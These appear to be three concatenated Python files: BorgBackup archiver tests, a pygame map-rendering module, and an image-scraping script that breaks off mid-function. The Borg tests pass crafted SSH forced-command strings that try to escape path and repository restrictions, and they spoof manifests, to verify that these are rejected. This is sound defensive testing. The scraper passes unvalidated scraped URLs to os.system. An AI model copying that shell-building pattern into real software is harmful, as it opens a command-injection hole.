key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
def spoof_manifest(self, repository):
with repository:
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'config': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
def test_fresh_init_tam_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
'version': 1,
'archives': {},
'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
})))
repository.commit(compact=False)
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
def test_not_required(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
with repository:
shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
_, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
key.tam_required = False
key.change_passphrase(key._passphrase)
manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
del manifest[b'tam']
repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
repository.commit(compact=False)
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM not found and not required' in output
# Run upgrade
self.cmd('upgrade', '--tam', self.repository_location)
# Manifest must be authenticated now
output = self.cmd('list', '--debug', self.repository_location)
assert 'archive1234' in output
assert 'TAM-verified manifest' in output
# Try to spoof / modify pre-1.0.9
self.spoof_manifest(repository)
# Fails
with pytest.raises(TAMRequiredError):
self.cmd('list', self.repository_location)
# Force upgrade
self.cmd('upgrade', '--tam', '--force', self.repository_location)
self.cmd('list', self.repository_location)
def test_disable(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
self.cmd('upgrade', '--disable-tam', self.repository_location)
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
assert not self.cmd('list', self.repository_location)
def test_disable2(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('archive1234')
repository = Repository(self.repository_path, exclusive=True)
self.spoof_manifest(repository)
self.cmd('upgrade', '--disable-tam', self.repository_location)
assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
prefix = '__testsuite__:'
def open_repository(self):
return RemoteRepository(Location(self.repository_location))
def test_remote_repo_restrict_to_path(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
# restricted to repo directory itself, fail for other directories with same prefix:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
# restricted to a completely different path:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
path_prefix = os.path.dirname(self.repository_path)
# restrict to repo directory's parent directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
# restrict to repo directory's parent directory and another directory:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
self.cmd('init', '--encryption=repokey', self.repository_location + '_3')
def test_remote_repo_restrict_to_repository(self):
# restricted to repo directory itself:
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
self.cmd('init', '--encryption=repokey', self.repository_location)
parent_path = os.path.join(self.repository_path, '..')
with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
with pytest.raises(PathNotAllowed):
self.cmd('init', '--encryption=repokey', self.repository_location)
@unittest.skip('only works locally')
def test_debug_put_get_delete_obj(self):
pass
@unittest.skip('only works locally')
def test_config(self):
pass
@unittest.skip('only works locally')
def test_migrate_lock_alive(self):
pass
def test_strip_components_doesnt_leak(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file', contents=b"test file contents 1")
self.create_regular_file('dir/file2', contents=b"test file contents 2")
self.create_regular_file('skipped-file1', contents=b"test file contents 3")
self.create_regular_file('skipped-file2', contents=b"test file contents 4")
self.create_regular_file('skipped-file3', contents=b"test file contents 5")
self.cmd('create', self.repository_location + '::test', 'input')
marker = 'cached responses left in RemoteRepository'
with changedir('output'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
self.assert_true(marker not in res)
with self.assert_creates_file('file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
self.assert_true(marker not in res)
with self.assert_creates_file('dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
self.assert_true(marker not in res)
with self.assert_creates_file('input/dir/file'):
res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
def setUp(self):
super().setUp()
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']
def corrupt(self, file, amount=1):
with open(file, 'r+b') as fd:
fd.seek(-amount, io.SEEK_END)
corrupted = bytes(255-c for c in fd.read(amount))
fd.seek(-amount, io.SEEK_END)
fd.write(corrupted)
def test_cache_chunks(self):
self.corrupt(os.path.join(self.cache_path, 'chunks'))
if self.FORK_DEFAULT:
out = self.cmd('info', self.repository_location, exit_code=2)
assert 'failed integrity check' in out
else:
with pytest.raises(FileIntegrityError):
self.cmd('info', self.repository_location)
def test_cache_files(self):
self.cmd('create', self.repository_location + '::test', 'input')
self.corrupt(os.path.join(self.cache_path, 'files'))
out = self.cmd('create', self.repository_location + '::test1', 'input')
# borg warns about the corrupt files cache, but then continues without files cache.
assert 'files cache is corrupted' in out
def test_chunks_archive(self):
self.cmd('create', self.repository_location + '::test1', 'input')
# Find ID of test1 so we can corrupt it later :)
target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
self.cmd('create', self.repository_location + '::test2', 'input')
# Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('info', self.repository_location, '--json')
chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
assert len(os.listdir(chunks_archive)) == 4 # two archives, one chunks cache and one .integrity file each
self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
# Trigger cache sync by changing the manifest ID in the cache config
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
# Cache sync notices corrupted archive chunks, but automatically recovers.
out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
assert 'Reading cached archive chunk index for test1' in out
assert 'Cached archive chunk index of test1 is corrupted' in out
assert 'Fetching and building archive index for test1' in out
def test_old_version_interfered(self):
# Modify the main manifest ID without touching the manifest ID in the integrity section.
# This happens if a version without integrity checking modifies the cache.
config_path = os.path.join(self.cache_path, 'config')
config = ConfigParser(interpolation=None)
config.read(config_path)
config.set('cache', 'manifest', bin_to_hex(bytes(32)))
with open(config_path, 'w') as fd:
config.write(fd)
out = self.cmd('info', self.repository_location)
assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
# Setup files for the first snapshot
self.create_regular_file('empty', size=0)
self.create_regular_file('file_unchanged', size=128)
self.create_regular_file('file_removed', size=256)
self.create_regular_file('file_removed2', size=512)
self.create_regular_file('file_replaced', size=1024)
os.mkdir('input/dir_replaced_with_file')
os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
os.mkdir('input/dir_removed')
if are_symlinks_supported():
os.mkdir('input/dir_replaced_with_link')
os.symlink('input/dir_replaced_with_file', 'input/link_changed')
os.symlink('input/file_unchanged', 'input/link_removed')
os.symlink('input/file_removed2', 'input/link_target_removed')
os.symlink('input/empty', 'input/link_target_contents_changed')
os.symlink('input/empty', 'input/link_replaced_by_file')
if are_hardlinks_supported():
os.link('input/file_replaced', 'input/hardlink_target_replaced')
os.link('input/empty', 'input/hardlink_contents_changed')
os.link('input/file_removed', 'input/hardlink_removed')
os.link('input/file_removed2', 'input/hardlink_target_removed')
self.cmd('init', '--encryption=repokey', self.repository_location)
# Create the first snapshot
self.cmd('create', self.repository_location + '::test0', 'input')
# Setup files for the second snapshot
self.create_regular_file('file_added', size=2048)
self.create_regular_file('file_empty_added', size=0)
os.unlink('input/file_replaced')
self.create_regular_file('file_replaced', contents=b'0' * 4096)
os.unlink('input/file_removed')
os.unlink('input/file_removed2')
os.rmdir('input/dir_replaced_with_file')
self.create_regular_file('dir_replaced_with_file', size=8192)
os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
os.mkdir('input/dir_added')
os.rmdir('input/dir_removed')
if are_symlinks_supported():
os.rmdir('input/dir_replaced_with_link')
os.symlink('input/dir_added', 'input/dir_replaced_with_link')
os.unlink('input/link_changed')
os.symlink('input/dir_added', 'input/link_changed')
os.symlink('input/dir_added', 'input/link_added')
os.unlink('input/link_replaced_by_file')
self.create_regular_file('link_replaced_by_file', size=16384)
os.unlink('input/link_removed')
if are_hardlinks_supported():
os.unlink('input/hardlink_removed')
os.link('input/file_added', 'input/hardlink_added')
with open('input/empty', 'ab') as fd:
fd.write(b'appended_data')
# Create the second snapshot
self.cmd('create', self.repository_location + '::test1a', 'input')
self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')
def do_asserts(output, can_compare_ids):
# File contents changed (deleted and replaced with a new file)
change = 'B' if can_compare_ids else '{:<19}'.format('modified')
assert 'file_replaced' in output # added to debug #3494
assert '{} input/file_replaced'.format(change) in output
# File unchanged
assert 'input/file_unchanged' not in output
# Directory replaced with a regular file
if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
# Basic directory cases
assert 'added directory input/dir_added' in output
assert 'removed directory input/dir_removed' in output
if are_symlinks_supported():
# Basic symlink cases
assert 'changed link input/link_changed' in output
assert 'added link input/link_added' in output
assert 'removed link input/link_removed' in output
# Symlink replacing or being replaced
assert '] input/dir_replaced_with_link' in output
assert '] input/link_replaced_by_file' in output
# Symlink target removed. Should not affect the symlink at all.
assert 'input/link_target_removed' not in output
# The inode has two links and the file contents changed. Borg
# should notice the changes in both links. However, the symlink
# pointing to the file is not changed.
change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
assert '{} input/empty'.format(change) in output
if are_hardlinks_supported():
assert '{} input/hardlink_contents_changed'.format(change) in output
if are_symlinks_supported():
assert 'input/link_target_contents_changed' not in output
# Added a new file and a hard link to it. Both links to the same
# inode should appear as separate files.
assert 'added 2.05 kB input/file_added' in output
if are_hardlinks_supported():
assert 'added 2.05 kB input/hardlink_added' in output
# check if a diff between non-existent and empty new file is found
assert 'added 0 B input/file_empty_added' in output
# The inode has two links and both of them are deleted. They should
# appear as two deleted files.
assert 'removed 256 B input/file_removed' in output
if are_hardlinks_supported():
assert 'removed 256 B input/hardlink_removed' in output
# Another link (marked previously as the source in borg) to the
# same inode was removed. This should not change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_removed' not in output
# Another link (marked previously as the source in borg) to the
# same inode was replaced with a new regular file. This should not
# change this link at all.
if are_hardlinks_supported():
assert 'input/hardlink_target_replaced' not in output
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
# We expect exit_code=1 due to the chunker params warning
do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)
def test_sort_option(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('a_file_removed', size=8)
self.create_regular_file('f_file_removed', size=16)
self.create_regular_file('c_file_changed', size=32)
self.create_regular_file('e_file_changed', size=64)
self.cmd('create', self.repository_location + '::test0', 'input')
os.unlink('input/a_file_removed')
os.unlink('input/f_file_removed')
os.unlink('input/c_file_changed')
os.unlink('input/e_file_changed')
self.create_regular_file('c_file_changed', size=512)
self.create_regular_file('e_file_changed', size=1024)
self.create_regular_file('b_file_added', size=128)
self.create_regular_file('d_file_added', size=256)
self.cmd('create', self.repository_location + '::test1', 'input')
output = self.cmd('diff', '--sort', self.repository_location + '::test0', 'test1')
expected = [
'a_file_removed',
'b_file_added',
'c_file_changed',
'd_file_added',
'e_file_changed',
'f_file_removed',
]
assert all(x in line for x, line in zip(expected, output.splitlines()))
def test_get_args():
archiver = Archiver()
# everything normal:
# first param is argv as produced by ssh forced command,
# second param is like from SSH_ORIGINAL_COMMAND env variable
args = archiver.get_args(['borg', 'serve', '--umask=0027', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --info')
assert args.func == archiver.do_serve
assert args.restrict_to_paths == ['/p1', '/p2']
assert args.umask == 0o027
assert args.log_level == 'info'
# similar, but with --restrict-to-repository
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --info --umask=0027')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break out of path restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg serve --restrict-to-path=/')
assert args.restrict_to_paths == ['/p1', '/p2']
# trying to cheat - break out of repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - break below repository restriction
args = archiver.get_args(['borg', 'serve', '--restrict-to-repository=/r1', '--restrict-to-repository=/r2', ],
'borg serve --restrict-to-repository=/r1/below')
assert args.restrict_to_repositories == ['/r1', '/r2']
# trying to cheat - try to execute different subcommand
args = archiver.get_args(['borg', 'serve', '--restrict-to-path=/p1', '--restrict-to-path=/p2', ],
'borg init --encryption=repokey /')
assert args.func == archiver.do_serve
# Check that environment variables in the forced command don't cause issues. If the command
# were not forced, environment variables would be interpreted by the shell, but this does not
# happen for forced commands - we get the verbatim command line and need to deal with env vars.
args = archiver.get_args(['borg', 'serve', ],
'BORG_FOO=bar borg serve --info')
assert args.func == archiver.do_serve
def test_chunk_content_equal():
def ccc(a, b):
chunks_a = [data for data in a]
chunks_b = [data for data in b]
compare1 = ItemDiff._chunk_content_equal(iter(chunks_a), iter(chunks_b))
compare2 = ItemDiff._chunk_content_equal(iter(chunks_b), iter(chunks_a))
assert compare1 == compare2
return compare1
assert ccc([
b'1234', b'567A', b'bC'
], [
b'1', b'23', b'4567A', b'b', b'C'
])
# one iterator exhausted before the other
assert not ccc([
b'12345',
], [
b'1234', b'56'
])
# content mismatch
assert not ccc([
b'1234', b'65'
], [
b'1234', b'56'
])
# first is the prefix of second
assert not ccc([
b'1234', b'56'
], [
b'1234', b'565'
])
class TestBuildFilter:
@staticmethod
def peek_and_store_hardlink_masters(item, matched):
pass
def test_basic(self):
matcher = PatternMatcher()
matcher.add([parse_pattern('included')], IECommand.Include)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='included'))
assert filter(Item(path='included/file'))
assert not filter(Item(path='something else'))
def test_empty(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='anything'))
def test_strip_components(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
assert not filter(Item(path='shallow'))
assert not filter(Item(path='shallow/')) # can this even happen? paths are normalized...
assert filter(Item(path='deep enough/file'))
assert filter(Item(path='something/dir/file'))
class TestCommonOptions:
@staticmethod
def define_common_options(add_common_option):
add_common_option('-h', '--help', action='help', help='show this help message and exit')
add_common_option('--critical', dest='log_level', help='foo',
action='store_const', const='critical', default='warning')
add_common_option('--error', dest='log_level', help='foo',
action='store_const', const='error', default='warning')
add_common_option('--append', dest='append', help='foo',
action='append', metavar='TOPIC', default=[])
add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
help='(default: %(default)d).')
@pytest.fixture
def basic_parser(self):
parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
parser.common_options = Archiver.CommonOptions(self.define_common_options,
suffix_precedence=('_level0', '_level1'))
return parser
@pytest.fixture
def subparsers(self, basic_parser):
if sys.version_info >= (3, 7):
# py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
else:
# py36 does not support required=... argument (but behaves like required=False).
# note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
@pytest.fixture
def parser(self, basic_parser):
basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
return basic_parser
@pytest.fixture
def common_parser(self, parser):
common_parser = argparse.ArgumentParser(add_help=False, prog='test')
parser.common_options.add_common_group(common_parser, '_level1')
return common_parser
@pytest.fixture
def parse_vars_from_line(self, parser, subparsers, common_parser):
subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
description='foo', epilog='bar', help='baz',
formatter_class=argparse.RawDescriptionHelpFormatter)
subparser.set_defaults(func=1234)
subparser.add_argument('--append-only', dest='append_only', action='store_true')
def parse_vars_from_line(*line):
print(line)
args = parser.parse_args(line)
parser.common_options.resolve(args)
return vars(args)
return parse_vars_from_line
def test_simple(self, parse_vars_from_line):
assert parse_vars_from_line('--error') == {
'append': [],
'lock_wait': 1,
'log_level': 'error',
'progress': False
}
assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
'append': [],
'lock_wait': 1,
'log_level': 'critical',
'progress': False,
'append_only': False,
'func': 1234,
}
with pytest.raises(SystemExit):
parse_vars_from_line('--append-only', 'subcommand')
assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
'append': ['foo', 'bar', 'baz'],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
@pytest.mark.parametrize('position', ('before', 'after', 'both'))
@pytest.mark.parametrize('flag,args_key,args_value', (
('-p', 'progress', True),
('--lock-wait=3', 'lock_wait', 3),
))
def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
line = []
if position in ('before', 'both'):
line.append(flag)
line.append('subcommand')
if position in ('after', 'both'):
line.append(flag)
result = {
'append': [],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
result[args_key] = args_value
assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
assert parse_storage_quota('50M') == 50 * 1000**2
with pytest.raises(argparse.ArgumentTypeError):
parse_storage_quota('5M')
def get_all_parsers():
"""
Return dict mapping command to parser.
"""
parser = Archiver(prog='borg').build_parser()
borgfs_parser = Archiver(prog='borgfs').build_parser()
parsers = {}
def discover_level(prefix, parser, Archiver, extra_choices=None):
choices = {}
for action in parser._actions:
if action.choices is not None and 'SubParsersAction' in str(action.__class__):
for cmd, parser in action.choices.items():
choices[prefix + cmd] = parser
if extra_choices is not None:
choices.update(extra_choices)
if prefix and not choices:
return
for command, parser in sorted(choices.items()):
discover_level(command + " ", parser, Archiver)
parsers[command] = parser
discover_level("", parser, Archiver, {'borgfs': borgfs_parser})
return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
if isinstance(parser.epilog, RstToTextLazy):
assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
assert str(rst_to_terminal(helptext))
|
entities.py
|
import game
import settings
import pygame
import threading
import pypboy.data
class Map(game.Entity):
_mapper = None
_transposed = None
_size = 0
_fetching = None
_map_surface = None
_loading_size = 0
_render_rect = None
def __init__(self, width, render_rect=None, loading_type="Loading map...", *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = width
self._map_surface = pygame.Surface((width, width))
self._render_rect = render_rect
super(Map, self).__init__((width, width), *args, **kwargs)
text = settings.RobotoB[14].render(loading_type, True, (settings.bright), (0, 0, 0))
self.image.blit(text, (10, 10))
def fetch_map(self, position, radius, isWorld):
self._fetching = threading.Thread(target=self._internal_fetch_map, args=(position, radius, isWorld))
self._fetching.start()
def _internal_fetch_map(self, position, radius, isWorld):
self._mapper.fetch_by_coordinate(position, radius, isWorld)
self.redraw_map()
def load_map(self, position, radius, isWorld):
self._fetching = threading.Thread(target=self._internal_load_map, args=(position, radius, isWorld))
self._fetching.start()
def _internal_load_map(self, position, radius, isWorld):
self._mapper.load_map_coordinates(position, radius, isWorld)
self.redraw_map()
# def update(self, *args, **kwargs):
# super(Map, self).update(*args, **kwargs)
def move_map(self, x, y):
self._render_rect.move_ip(x, y)
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(settings.mid), # Map line Color
False,
way,
2
)
for tag in self._mapper.transpose_tags((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
if tag[3] in settings.AMENITIES:
image = settings.AMENITIES[tag[3]]
pygame.transform.scale(image, (10, 10))
self._map_surface.blit(image, (tag[1], tag[2]))
text = settings.RobotoB[12].render(tag[0], True, (settings.bright), (0, 0, 0))
self._map_surface.blit(text, (tag[1] + 17, tag[2] + 4))
else:
image = settings.MAP_ICONS['misc']
self.image.blit(self._map_surface, (0, 0), area=self._render_rect)
class MapSquare(game.Entity):
_mapper = None
_size = 0
_fetching = None
_map_surface = None
map_position = (0, 0)
def __init__(self, size, map_position, parent, *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = size
self.parent = parent
self._map_surface = pygame.Surface((size * 2, size * 2))
self.map_position = map_position
self.tags = {}
super(MapSquare, self).__init__((size, size), *args, **kwargs)
def fetch_map(self):
self._fetching = threading.Thread(target=self._internal_fetch_map)
self._fetching.start()
def _internal_fetch_map(self):
self._mapper.fetch_grid(self.map_position)
self.redraw_map()
self.parent.redraw_map()
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size, self._size), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(settings.mid),
False,
way,
1
)
for tag in self._mapper.transpose_tags((self._size, self._size), (self._size / 2, self._size / 2)):
self.tags[tag[0]] = (tag[1] + self.position[0], tag[2] + self.position[1], tag[3])
self.image.fill((0, 0, 0))
self.image.blit(self._map_surface, (-self._size / 2, -self._size / 2))
class MapGrid(game.Entity):
_grid = None
_delta = 0.002
_starting_position = (0, 0)
def __init__(self, starting_position, dimensions, *args, **kwargs):
self._grid = []
self._starting_position = starting_position
self.dimensions = dimensions
self._tag_surface = pygame.Surface(dimensions)
super(MapGrid, self).__init__(dimensions, *args, **kwargs)
self.tags = {}
self.fetch_outwards()
def test_fetch(self):
for x in range(10):
for y in range(5):
square = MapSquare(
100,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
)
)
square.fetch_map()
square.position = (100 * x, 100 * y)
self._grid.append(square)
def fetch_outwards(self):
for x in range(-4, 4):
for y in range(-2, 2):
square = MapSquare(
86,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
),
self
)
square.fetch_map()
square.position = ((86 * x) + (self.dimensions[0] / 2) - 43, (86 * y) + (self.dimensions[1] / 2) - 43)
self._grid.append(square)
def draw_tags(self):
self.tags = {}
for square in self._grid:
self.tags.update(square.tags)
self._tag_surface.fill((0, 0, 0))
for name in self.tags:
if self.tags[name][2] in settings.AMENITIES:
image = settings.AMENITIES[self.tags[name][2]]
#else:
# print "Unknown amenity: %s" % self.tags[name][2]
# image = settings.MAP_ICONS['misc']
pygame.transform.scale(image, (10, 10))
self.image.blit(image, (self.tags[name][0], self.tags[name][1]))
# try:
text = settings.RobotoB[12].render(name, True, (settings.bright), (0, 0, 0))
# text_width = text.get_size()[0]
# pygame.draw.rect(
# self,
# (0, 0, 0),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 0
# )
self.image.blit(text, (self.tags[name][0] + 17, self.tags[name][1] + 4))
# pygame.draw.rect(
# self,
# (95, 255, 177),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 1
# )
# except Exception, e:
# print(e)
# pass
def redraw_map(self, *args, **kwargs):
self.image.fill((0, 0, 0))
for square in self._grid:
self.image.blit(square._map_surface, square.position)
self.draw_tags()
|
collect_data.py
|
import os
import re
import urllib
from multiprocessing import Process
SUPPORTED_FORMATS = ['jpg', 'png', 'jpeg']
URL_TEMPLATE = r'http://image.b***u.com/search/flip?tn=b***uimage&ie=utf-8&word={keyword}&pn={index}'
def download_images_from_b***u(dir_name, keyword, start_index, end_index):
index = start_index
while index < end_index:
url = URL_TEMPLATE.format(keyword=keyword, index=index)
try:
html_text = urllib.urlopen(url).read().decode('utf-8', 'ignore')
image_urls = re.findall(r'"objURL":"(.*?)"', html_text)
if not image_urls:
print('Cannot retrieve anymore image urls \nStopping ...'.format(url))
break
except IOError as e:
print(e)
print('Cannot open {}. \nStopping ...'.format(url))
break
downloaded_urls = []
for url in image_urls:
filename = url.split('/')[-1]
ext = filename[filename.rfind('.')+1:]
if ext.lower() not in SUPPORTED_FORMATS:
index += 1
continue
filename = '{}/{:0>6d}.{}'.format(dir_name, index, ext)
cmd = 'wget "{}" -t 3 -T 5 -O {}'.format(url, filename)
os.system(cmd)
if os.path.exists(filename) and os.path.getsize(filename) > 1024:
index_url = '{:0>6d},{}'.format(index, url)
downloaded_urls.append(index_url)
else:
os.system('rm {}'.format(filename))
index += 1
if index >= end_index:
break
with open('{}_urls.txt'.format(dir_name), 'a') as furls:
urls_text = '{}\n'.format('\n'.join(downloaded_urls))
if len(urls_text) > 11:
furls.write(urls_text)
def download_images(keywords, num_per_kw, procs_per_kw):
args_list = []
for class_id, keyword in enumerate(keywords):
dir_name = '{:0>3d}'.format(class_id)
os.system('mkdir -p {}'.format(dir_name))
